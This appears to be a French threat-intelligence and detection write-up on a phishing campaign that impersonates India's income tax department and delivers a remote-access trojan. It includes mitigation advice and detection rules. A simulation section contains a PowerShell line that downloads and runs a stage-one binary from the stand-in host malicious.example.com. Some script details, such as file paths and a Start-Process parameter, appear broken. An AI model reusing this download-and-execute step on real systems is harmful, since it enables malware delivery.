Campagne de Phishing Usurpe l’Impôt sur le Revenu Indien pour Cibler les Entreprises
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Une opération de phishing imitant le département des impôts sur le revenu indien distribue un PDF piégé qui oriente les destinataires vers un portail de conformité contrefait. Le site incite les victimes à télécharger un fichier ZIP contenant un installateur NSIS signé, qui déploie ensuite un cheval de Troie d’accès à distance à plusieurs étapes. Le RAT persiste en créant un service Windows et communique avec plusieurs serveurs de commande et de contrôle via des ports non standards.
Investigation
Les chercheurs ont analysé l’appât PDF, l’URL intégrée et le flux de travail de l’installateur NSIS en chaîne. Ils ont documenté les binaires déposés sur le disque, la création d’un dossier d’installation caché, et l’enregistrement de NSecRTS.exe comme un service Windows. Le rapport capturait également les communications sortantes vers trois adresses IP et soulignait l’utilisation de charges signées tout au long de la chaîne de livraison.
Atténuation
Bloquer le domaine malveillant et les adresses IP associées à la périphérie et via les contrôles de proxy. Renforcer les protections des e-mails pour identifier les pièces jointes et liens sur le thème des impôts conduisant à des portails de conformité imités. Empêcher l’exécution automatique d’installateurs non fiables lorsque possible, et surveiller la création de services suspects — spécialement tout ce qui porte le nom Service de protection en temps réel de Windows.
Réponse
Alerter sur les noms de fichiers, hachages et activités d’enregistrement de service Windows liés à la chaîne d’infection. Isoler les points d’extrémité impactés, acquérir des images mémoire et disque, et effectuer un balayage médico-légal complet pour identifier d’autres étapes RAT ou outils. Supprimer les artéfacts de persistance et réinitialiser les identifiants potentiellement exposés pour empêcher toute nouvelle entrée.
Flux d’attaque
Détections
Commandement et contrôle suspect par demande DNS de domaine de premier niveau (TLD) inhabituel (via DNS)
Voir
IOC (DestinationIP) à détecter : Campagne de phishing sur le thème de l’impôt indien visant les entreprises locales
Voir
IOC (SourceIP) à détecter : Campagne de phishing sur le thème de l’impôt indien visant les entreprises locales
Voir
IOC (HashMd5) à détecter : Campagne de phishing sur le thème de l’impôt indien visant les entreprises locales
Voir
Détection de l’exécution de malware dans une campagne de phishing sur le thème de l’impôt indien [Création de processus Windows]
Voir
Détection de la communication C2 de NSecRTS.exe [Connexion réseau Windows]
Voir
Exécution de Simulation
Prérequis : Le contrôle pré-vol de la télémétrie et de la base doit avoir été passé.
Rationale : Cette section détaille l’exécution précise de la technique d’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et visent à générer la télémétrie exacte attendue par la logique de détection.
-
Narratif & Commandes de l’attaque :
Un adversaire délivre un e-mail de phishing intitulé « Avis d’impôt sur le revenu ». La pièce jointe est un document Word malveillant qui déposesetup_Ir5swQ3EpeuBpePEpew=.exeto%TEMP%. La victime exécute le fichier, qui à son tour génèreSibuia.exe(la vraie charge utile) comme son enfant. Cette chaîne parent-enfant est conçue pour contourner les alertes génériques de création de processus mais est interceptée par la règle Sigma.Étapes effectuées sur l’hôte compromis :
- Déposez le binaire de première étape :
$stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" Invoke-WebRequest -Uri "http://malicious.example.com/stage1" -OutFile $stage1 - Exécuter le binaire de première étape :
Start-Process -FilePath $stage1 -NoNewWindow - Le binaire de première étape crée en interne le binaire de la deuxième étape
Sibuia.exedans le même répertoire et le lance : (Simulé par le script de test ci-dessous.)
- Déposez le binaire de première étape :
-
Script de Test de Régression :
Le script ci-dessous reproduit la relation exacte parent‑enfant requise pour déclencher la règle.# ------------------------------------------------- # Simulation de la chaîne de phishing sur les impôts indiens # ------------------------------------------------- # Définir les chemins $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" $stage2 = "$env:TEMPSibuia.exe" # Créer des binaires factices (zéro octet – suffisant pour la journalisation Sysmon) Set-Content -Path $stage1 -Value 'REM stage1 placeholder' -Encoding ASCII Set-Content -Path $stage2 -Value 'REM stage2 placeholder' -Encoding ASCII # S'assurer que les fichiers sont exécutables (Windows n'a pas besoin de chmod) Write-Host "[*] Lancement stage1..." $proc1 = Start-Process -FilePath $stage1 -PassThru # Donner un moment à stage1 pour « lancer » stage2 (simulé par lancement direct) Start-Sleep -Milliseconds 500 Write-Host "[*] Stage1 lance stage2 (Sibuia.exe)..." $proc2 = Start-Process -FilePath $stage2 -PassThru -Parent $proc1.Id Write-Host "[+] Simulation complète. Vérifiez la détection dans le SIEM." # ------------------------------------------------- -
Commandes de Nettoyage :
Supprimez les artéfacts et terminez tous les processus restants.# Arrêter tous les processus restants Get-Process -Name "setup_Ir5swQ3EpeuBpePEpew=" -ErrorAction SilentlyContinue | Stop-Process -Force Get-Process -Name "Sibuia" -ErrorAction SilentlyContinue | Stop-Process -Force # Supprimer les fichiers Remove-Item -Path "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPSibuia.exe" -Force -ErrorAction SilentlyContinue Write-Host "[*] Nettoyage terminé."